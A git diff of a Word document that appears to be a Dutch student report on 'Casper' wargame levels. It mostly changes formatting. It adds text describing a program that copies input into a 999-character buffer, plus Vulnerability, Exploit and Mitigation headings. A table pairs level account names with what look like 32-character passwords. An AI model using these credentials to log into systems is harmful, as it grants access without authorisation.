-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="776F3E43"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BDB6864C"/>
@@ -4222,13 +5342,16 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5300,7 +6423,6 @@
     <w:rsidRoot w:val="007B5ECD"/>
     <w:rsid w:val="00183736"/>
     <w:rsid w:val="007B5ECD"/>
-    <w:rsid w:val="00AB22A5"/>
     <w:rsid w:val="00CA0CD2"/>
   </w:rsids>
   <m:mathPr>
@@ -6098,7 +7220,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2D22B44F-9F1D-4703-943D-EB6AA235B621}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B62327D3-7DC1-4266-81FA-8B2D184AA2EA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -10,6 +10,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p/>
         <w:tbl>
@@ -45,6 +46,7 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                 <w:text/>
               </w:sdtPr>
+              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -117,6 +119,7 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -161,6 +164,7 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                 <w:text/>
               </w:sdtPr>
+              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -230,6 +234,7 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -272,6 +277,7 @@
                     <w:calendar w:val="gregorian"/>
                   </w:date>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -1688,6 +1694,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Casper8</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1701,6 +1713,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>q6UYWuXz0iv7b65t1qnHAFBeL4w41YEQ</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1737,6 +1755,8 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1750,11 +1770,11 @@
         <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc25519920"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc25519920"/>
       <w:r>
         <w:t>Casper4</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1764,7 +1784,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc25519921"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc25519921"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1772,7 +1792,7 @@
         </w:rPr>
         <w:t>Omschrijving</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -1954,19 +1974,17 @@
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc25519922"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc25519922"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
-      <w:proofErr w:type="spellEnd"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2124,14 +2142,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc25519923"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc25519923"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Exploit beschrijving</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2772,17 +2790,19 @@
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc25519924"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc25519924"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Mitigation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3128,17 +3148,17 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc25519925"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc25519925"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Advanced level: Casper41</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3224,40 +3244,38 @@
         <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc25519926"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc25519926"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>6</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc25519927"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc25519927"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Omschrijving</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
-      <w:proofErr w:type="spellEnd"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3593,7 +3611,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc25519928"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc25519928"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3601,7 +3619,7 @@
         </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -3735,25 +3753,17 @@
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc25519929"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>beschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="10"/>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc25519929"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3991,7 +4001,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc25519930"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc25519930"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3999,7 +4009,7 @@
         </w:rPr>
         <w:t>Mitigation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="12"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -4235,17 +4245,17 @@
         <w:pStyle w:val="Kop2"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc25519931"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc25519931"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Advanced level: Casper61</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4344,8 +4354,6 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4673,6 +4681,7 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
+    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -6424,6 +6433,7 @@
     <w:rsid w:val="00183736"/>
     <w:rsid w:val="007B5ECD"/>
     <w:rsid w:val="00CA0CD2"/>
+    <w:rsid w:val="00DE32B4"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
@@ -7220,7 +7230,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B62327D3-7DC1-4266-81FA-8B2D184AA2EA}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F8F1E0FD-A178-4604-AFE4-F60DB66F49AB}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -1341,9 +1341,9 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2606"/>
-        <w:gridCol w:w="3888"/>
-        <w:gridCol w:w="2532"/>
+        <w:gridCol w:w="2578"/>
+        <w:gridCol w:w="3949"/>
+        <w:gridCol w:w="2499"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1698,7 +1698,13 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>Casper8</w:t>
+              <w:t>c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>asper8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1735,6 +1741,115 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>casper80</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>swaysxx5L11ycLAOP3urZ1nLfFlocrqY</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>casper10</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Ztbqs7CPzvM49D5PXyW5VvJSc1MvTODU</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -1755,26 +1870,209 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc25519920"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Casper4</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop1"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc25519920"/>
-      <w:r>
-        <w:t>Casper4</w:t>
+      <w:bookmarkStart w:id="2" w:name="_Toc25519921"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
       </w:r>
       <w:bookmarkEnd w:id="2"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het casper4 programma vereist </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">één parameter als input. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Usage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/casper4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>YourName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” teruggeve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vervolgens stopt het programma met een errorcode 1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Indien er wel een parameter meegegeven wordt gaat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie opgeroepen worden met de meegegeven input.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens de meegegeven input </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> naar deze buffer.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Tot slot print het “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” gevolgd door de inhoud van de buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1784,92 +2082,128 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc25519921"/>
-      <w:proofErr w:type="spellStart"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc25519922"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Omschrijving</w:t>
+        <w:t>Vulnerability</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Het casper4 programma vereist </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">één parameter als input. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Usage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>: /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>casper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/casper4 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>YourName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>teruggeve</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Dit</w:t>
+      </w:r>
